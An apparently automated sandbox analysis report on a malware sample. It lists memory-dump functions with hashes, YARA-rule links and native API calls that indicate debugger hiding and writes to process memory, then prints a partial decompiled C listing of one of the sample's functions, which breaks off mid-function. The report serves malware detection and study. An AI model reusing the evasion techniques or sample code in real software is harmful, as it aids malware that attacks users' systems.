Function 021F1F98, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: fc3cbebeb021d9da4c067c6ea0db456ab00563b1fb5464a564d327e348abba3f
Instruction ID: 62b2bcc9ea68efeb3d406041c812e6d8b833465bb883c9ae52fd1dc5a8f2f86f
Opcode Fuzzy Hash: fc3cbebeb021d9da4c067c6ea0db456ab00563b1fb5464a564d327e348abba3f
Instruction Fuzzy Hash: B4414EB22C5704DFFBB84E1489143A776D1AF49755F05032ADFB71AAEAD3B88841CA07

Uniqueness

Uniqueness Score: -1.00%

Function 021F4B05, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 308552e1c007db5701f1b53f8656d8fbb90c92b80ad22d1a084e5ce975a5d457
Instruction ID: e5e85faa921cda444658917d09bc34209143e051c16789ecb0f8e02eb151776c
Opcode Fuzzy Hash: 308552e1c007db5701f1b53f8656d8fbb90c92b80ad22d1a084e5ce975a5d457
Instruction Fuzzy Hash: B8315B74BC4305AAEBA45F548C517E737D2AF89760F154226EFB25B2CAD3B4CC01C651

Uniqueness

Uniqueness Score: -1.00%

Function 021F042D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021F43F3: LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 39b50d6c78d2471a5d72b601aeb7e4d5ac7d1294dd4853c055af96848aed424e
Instruction ID: 5267894f88540ef61fb648648999736b89f4cc3a0b871bdf42df762d6b020a15
Opcode Fuzzy Hash: 39b50d6c78d2471a5d72b601aeb7e4d5ac7d1294dd4853c055af96848aed424e
Instruction Fuzzy Hash: 7A2102B0684306AEEB545E244D62BEA3791AF097A4F150225BFB29B2D6E3B0C801CA51

Uniqueness

Uniqueness Score: -1.00%

Function 021F0485, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021F43F3: LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 40f58e4c2a8832c0781e0f0b428116763321a4f9b0415784ada781f8ff87432f
Instruction ID: 42afac40541d6ae27c81998874d1a37c328e80ab0c3b32c55518e2eff79141be
Opcode Fuzzy Hash: 40f58e4c2a8832c0781e0f0b428116763321a4f9b0415784ada781f8ff87432f
Instruction Fuzzy Hash: 1B01F9B02803196BEB445E144CA17EB3791AB097B4F140325EF725A2D6D7B0CC06C591

Uniqueness

Uniqueness Score: -1.00%

Function 021F20D3, Relevance: 3.3, APIs: 2, Instructions: 303sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: cfa57a2bc4d95ca6786407eee6a06249a04453a15b122667a60d3d2e263febe9
Instruction ID: ca5c7e49264f7893fffb623b2927d66ee2be82b87ca005f0e54095e6a933ea47
Opcode Fuzzy Hash: cfa57a2bc4d95ca6786407eee6a06249a04453a15b122667a60d3d2e263febe9
Instruction Fuzzy Hash: 0DA123B1281309BFFFA95E10CC45BE93A62EF45350F524224FFA96B1D0C3BA9895DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F20E1, Relevance: 1.8, APIs: 1, Instructions: 274sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: caf923a2dd83d551f561cf4c18014847886317fd1d6d668768d907ccfd64ace3
Instruction ID: 6cd3dafbb4e19195658eebeb2a701d44df4318cf1ff1fdb76b59c19f0635d3bc
Opcode Fuzzy Hash: caf923a2dd83d551f561cf4c18014847886317fd1d6d668768d907ccfd64ace3
Instruction Fuzzy Hash: 9B9122B1281305BFFFA45E10CD45BE93A62EF45340F524224EFA9AB1D0D3B99885DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F2119, Relevance: 1.8, APIs: 1, Instructions: 260sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 46f40c3d32fdc24beb1d72b5aa1feb1e132d9101f59903528f47e40b4e96464f
Instruction ID: c8f6e50f894f09ea1e980978af595cfa28899c3208e9beaa53fbf2677e5ee9c0
Opcode Fuzzy Hash: 46f40c3d32fdc24beb1d72b5aa1feb1e132d9101f59903528f47e40b4e96464f
Instruction Fuzzy Hash: 699134B1281305BFFFA45E10CC44BE93A72EF45354F518224EFA9AB1D0C3B99885DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F216D, Relevance: 1.7, APIs: 1, Instructions: 240sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 0adfee484b7dba71d901815dbfaae73b65c4acc62bfb782394dacc30f5e00bb8
Instruction ID: 4c90b7840d6471a356f2f6390f34cb49f5afee346152ef2341189566601a0a31
Opcode Fuzzy Hash: 0adfee484b7dba71d901815dbfaae73b65c4acc62bfb782394dacc30f5e00bb8
Instruction Fuzzy Hash: 8B8135B1281209BFFFA55E10CD94BE93A62EF05350F518224EFA9971D0D3B99894DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F2189, Relevance: 1.7, APIs: 1, Instructions: 237sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 3a143616f364c457be74ee7397f8d54a02eba2a26f9ac38a8fb61b45718f4cd7
Instruction ID: 611f102d5d08e5216cf455e6a504d25338a3db3054f2a00797477bcad445fb22
Opcode Fuzzy Hash: 3a143616f364c457be74ee7397f8d54a02eba2a26f9ac38a8fb61b45718f4cd7
Instruction Fuzzy Hash: CB8135B1281209BFFFA45F10CD54BE93B62EF05350F518224EF699B1D0D3B99884DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F21C5, Relevance: 1.7, APIs: 1, Instructions: 222sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 21ef7f210df005bee86eb9026fa282cb611ca812a4df6e8ba076eb1a944038f8
Instruction ID: 5705b5fc0c6925a83aa7e41929b8be9f4623066aed57e843a5061bb86bbd66ad
Opcode Fuzzy Hash: 21ef7f210df005bee86eb9026fa282cb611ca812a4df6e8ba076eb1a944038f8
Instruction Fuzzy Hash: 5B7125B1281309AFFFA48F10CD54BE93AA2EF05344F518124EF699B1D0D3B99894DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F21F1, Relevance: 1.7, APIs: 1, Instructions: 212sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 5aca2219117a9ca40bc5654a78ba2713a7741e40d3d7d3c9f8cd16d9a7eb2782
Instruction ID: d6f256c6dc9e179b7b557461c293560eda5493da48c7b477d484f3d6a27dbc78
Opcode Fuzzy Hash: 5aca2219117a9ca40bc5654a78ba2713a7741e40d3d7d3c9f8cd16d9a7eb2782
Instruction Fuzzy Hash: 9C7101B128120ABFFFA49E10CD55BE936B2EF05344F518224EFA99B1D0D3B99894DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F22D5, Relevance: 1.7, APIs: 1, Instructions: 169sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: a00c409df46b5fe56efe46dab2c3509b98090273f150b5b0b94c223c08ff8ee6
Instruction ID: 170b60b30cd9f5219ad97a001d29776d9bfb56cc01cbf89d60343d707c429ade
Opcode Fuzzy Hash: a00c409df46b5fe56efe46dab2c3509b98090273f150b5b0b94c223c08ff8ee6
Instruction Fuzzy Hash: 6151D4B12C1209BFFFA59E10CC55BF93662EF09354F154124FFA99A1E0C3BA58D4EA41

Uniqueness

Uniqueness Score: -1.00%

Function 021F2315, Relevance: 1.7, APIs: 1, Instructions: 154sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 54276db0715a97d29176faed3e79159275ba24da711397b32b164c79e71fa3bc
Instruction ID: 16224f8758308ece6f6bb2bf8d6ff3d865e9a21c1baa17ef90baca706fc92672
Opcode Fuzzy Hash: 54276db0715a97d29176faed3e79159275ba24da711397b32b164c79e71fa3bc
Instruction Fuzzy Hash: 3E5123B12C1209AFEFA99E10CC94BF93762EF08314F554124FFA99A1E0C3B95894EB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F2385, Relevance: 1.6, APIs: 1, Instructions: 130sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 380abf933c463f784d2959ce292801591e279bf38a71ee49319be39592352f4d
Instruction ID: 2bb119fb2e554e825772c0ab2efeed312be94d565e511ac8edea15b59a576e6d
Opcode Fuzzy Hash: 380abf933c463f784d2959ce292801591e279bf38a71ee49319be39592352f4d
Instruction Fuzzy Hash: 9441D2B12C1209BFEFA99E10CD94BF93663FF08314F554124FFA9961A0C7B95894DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F23C1, Relevance: 1.6, APIs: 1, Instructions: 113sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 48bf0db7dce09952eb3979f297a18ecf42564adaca4b3099ebf9a6ae99378ea7
Instruction ID: 3b88f77acc0f0304d37b64484682660c46083098b3edadc4f4cc508d0cdbffd8
Opcode Fuzzy Hash: 48bf0db7dce09952eb3979f297a18ecf42564adaca4b3099ebf9a6ae99378ea7
Instruction Fuzzy Hash: 8141F2B1281209AFEFAA9E10CC94BF83773FF08314F454121FFA9961A0C7B55894EB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F2415, Relevance: 1.6, APIs: 1, Instructions: 100nativesleepthreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationMemorySleepThreadVirtualWrite
String ID:
API String ID: 4102976366-0
Opcode ID: 13ba9f063f738b8a80fc1ae6419f223855bbccb9b65b84d308be94bb5f1b62cc
Instruction ID: efadee788abb3a28d5a6f23cc80de427ef952880e3eb4ed43ef165943644fba5
Opcode Fuzzy Hash: 13ba9f063f738b8a80fc1ae6419f223855bbccb9b65b84d308be94bb5f1b62cc
Instruction Fuzzy Hash: 0831D0B0281249AFEFAA9E10CDA0BE93B73FF08310F454125EFA9561A0C7B55895DB41

Uniqueness

Uniqueness Score: -1.00%

Function 021F2445, Relevance: 1.6, APIs: 1, Instructions: 90nativesleepthreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationMemorySleepThreadVirtualWrite
String ID:
API String ID: 4102976366-0
Opcode ID: 621ebbb84943327256590785e61d79e006124beb5671647d861da4084c9af768
Instruction ID: fa37fe46828d39b29f179c386e81ee71e700c65b556e7ea9cb105f8da6ffcba3
Opcode Fuzzy Hash: 621ebbb84943327256590785e61d79e006124beb5671647d861da4084c9af768
Instruction Fuzzy Hash: 0931D0B1281209AFEFA99E10CDA0BF93763FF48310F554120FFA9561A0C7B65895DB40

Uniqueness

Uniqueness Score: -1.00%

Function 021F2495, Relevance: 1.6, APIs: 1, Instructions: 74nativesleepthreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationMemorySleepThreadVirtualWrite
String ID:
API String ID: 4102976366-0
Opcode ID: 1d86ec7300b52d85a148d0da424ce2e4c75973182cf26ee511523b7379f45306
Instruction ID: 3e1ce81680cb570d6892ee552d9a594870c5cae7cf470354b97b748219a20fee
Opcode Fuzzy Hash: 1d86ec7300b52d85a148d0da424ce2e4c75973182cf26ee511523b7379f45306
Instruction Fuzzy Hash: B221BEB128120AAFEFA9AE10CDA0BF93B63FF48310F454120FF6956160C7769895EB40

Uniqueness

Uniqueness Score: -1.00%

Function 021F24CD, Relevance: 1.6, APIs: 1, Instructions: 60sleepnativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemorySleepVirtualWrite
String ID:
API String ID: 1877509360-0
Opcode ID: 7c97e8f715cfb79cee639b6c3ba268f69880d98527f982db573ecb3216376108
Instruction ID: 780ae877334276db7ae31202c3113fc7624a17c930a464ae2b21a9c437f4e674
Opcode Fuzzy Hash: 7c97e8f715cfb79cee639b6c3ba268f69880d98527f982db573ecb3216376108
Instruction Fuzzy Hash: 9011BFB1181206BFDFA9AF10DD60BE83BB3BF18310F854120EFA955060C77658A5EB40

Uniqueness

Uniqueness Score: -1.00%

Function 021F24ED, Relevance: 1.6, APIs: 1, Instructions: 56nativesleepthreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F24F8
Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationMemorySleepThreadVirtualWrite
String ID:
API String ID: 4102976366-0
Opcode ID: cb4b66954d8a2afe0bda05ab6829d641625c275c0166913d9147d54b4f66dbd1
Instruction ID: 2a044d4553663bed03b4e39e36b24e5cc4543775dd51e1cd4d3f3fb77d48db8c
Opcode Fuzzy Hash: cb4b66954d8a2afe0bda05ab6829d641625c275c0166913d9147d54b4f66dbd1
Instruction Fuzzy Hash: 8011C2B12C220ABFDFA5AF10DD60BF83B73BF14310F964120EFA955160C7365895DA41

Uniqueness

Uniqueness Score: -1.00%

Function 021F04AD, Relevance: 1.5, APIs: 1, Instructions: 47nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE

Part of subcall function 021F43F3: LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID:
API String ID: 543350213-0
Opcode ID: dad06bb7b8e7d3153ec31bfb776cfb8737f22f32b10afd4b4656a43c0d7dc396
Instruction ID: 16f0de618de70bcc73ae192c07f0444a49da6d128e0f61afa7b0b11a3c1a2368
Opcode Fuzzy Hash: dad06bb7b8e7d3153ec31bfb776cfb8737f22f32b10afd4b4656a43c0d7dc396
Instruction Fuzzy Hash: B501F9B02C471A5BEB445E189C617EB3B959F0A3F8F090325EE725A2D6D7A0CC06CA90

Uniqueness

Uniqueness Score: -1.00%

Function 021F58B4, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021F54D1,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F), ref: 021F58CD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 021F362C, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,?,00000000,00000000,00000050,0000036F,?,021F30F5,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F3643

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb4dad7ecc0eff68df204f83a2b31d6d0d540640745f27a2c9971cba85b89995
Instruction ID: 0a509be3de97e4ae119b72a7e532369633324efd6281a70ac3d436a551af6a93
Opcode Fuzzy Hash: cb4dad7ecc0eff68df204f83a2b31d6d0d540640745f27a2c9971cba85b89995
Instruction Fuzzy Hash: E4B012702C024C13C4807166040468B01268BC13C3FE9C0549E1146A4EDF21C96577D1

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA64, Relevance: 142.7, APIs: 75, Strings: 6, Instructions: 972
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040BA64(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v22;
				intOrPtr _v24;
				long long* _v28;
				intOrPtr _v40;
				short _v44;
				char _v52;
				short _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v104;
				char _v112;
				intOrPtr _v120;
				char _v128;
				char* _v136;
				char _v144;
				char _v152;
				intOrPtr _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v200;
				intOrPtr _v204;
				char _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				intOrPtr* _v280;
				signed int _v284;
				intOrPtr* _v288;
				signed int _v292;
				signed int _v296;
				intOrPtr* _v300;
				signed int _v304;
				intOrPtr* _v308;
				signed int _v312;
				intOrPtr* _v316;
				signed int _v320;
				intOrPtr* _v324;
				signed int _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				intOrPtr* _v352;
				signed int _v356;
				intOrPtr* _v360;
				signed int _v364;
				intOrPtr* _v368;
				signed int _v372;
				signed int _v376;
				intOrPtr* _v380;
				signed int _v384;
				intOrPtr* _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _t495;
				signed int _t499;
				signed int _t503;
				signed int _t514;
				signed int _t518;
				signed int _t523;
				signed int _t527;
				signed int _t531;
				signed int _t536;
				signed int _t540;
				char* _t544;
				signed int _t548;
				signed int _t552;
				signed int _t556;
				char* _t565;
				signed int _t568;
				signed int _t580;
				signed int _t584;
				signed int _t594;
				signed int _t598;
				signed int _t602;
				signed int _t606;
				char* _t610;
				signed int _t614;
				signed int _t618;
				signed int _t622;
				signed int _t649;
				signed int _t653;
				signed int _t657;
				signed int _t661;
				signed int _t665;
				char* _t669;
				signed int _t673;
				signed int _t683;
				signed int _t693;
				signed int _t699;
				void* _t700;
				intOrPtr _t704;
				intOrPtr _t708;
				intOrPtr _t722;
				void* _t769;
				void* _t771;
				long long* _t772;
				intOrPtr* _t773;

				_t772 = _t771 - 0x18;
				 *[fs:0x0] = _t772;
				L004011C0();
				_v28 = _t772;
				_v24 = E004010C0;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, _t769);
				_v8 = 1;
				_v8 = 2;
				_t495 =  *((intOrPtr*)( *_a4 + 0x70))(_a4,  &_v172);
				asm("fclex");
				_v212 = _t495;
				if(_v212 >= 0) {
					_v276 = _v276 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x409c7c);
					_push(_a4);
					_push(_v212);
					L004012B0();
					_v276 = _t495;
				}
				L004012B6();
				_v60 = _t495;
				_v8 = 3;
				if( *0x410010 != 0) {
					_v280 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v280 = 0x410010;
				}
				_t704 =  *((intOrPtr*)( *_v280));
				_t499 =  &_v80;
				L004012AA();
				_v212 = _t499;
				_t503 =  *((intOrPtr*)( *_v212 + 0x190))(_v212,  &_v164, _t499,  *((intOrPtr*)(_t704 + 0x308))( *_v280));
				asm("fclex");
				_v216 = _t503;
				if(_v216 >= 0) {
					_v284 = _v284 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x409f4c);
					_push(_v212);
					_push(_v216);
					L004012B0();
					_v284 = _t503;
				}
				_v168 = _v164;
				_v96 =  *0x401138;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4, _t704, _t704,  &_v168,  &_v172);
				_v64 = _v172;
				L0040129E();
				_v8 = 4;
				if( *0x410010 != 0) {
					_v288 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a114);
					L004012A4();
					_v288 = 0x410010;
				}
				_t708 =  *((intOrPtr*)( *_v288));
				_t514 =  &_v80;
				L004012AA();
				_v212 = _t514;
				_t518 =  *((intOrPtr*)( *_v212 + 0x60))(_v212,  &_v172, _t514,  *((intOrPtr*)(_t708 + 0x308))( *_v288));
				asm("fclex");
				_v216 = _t518;
				if(_v216 >= 0) {
					_v292 = _v292 & 0x00000000;
				} else {
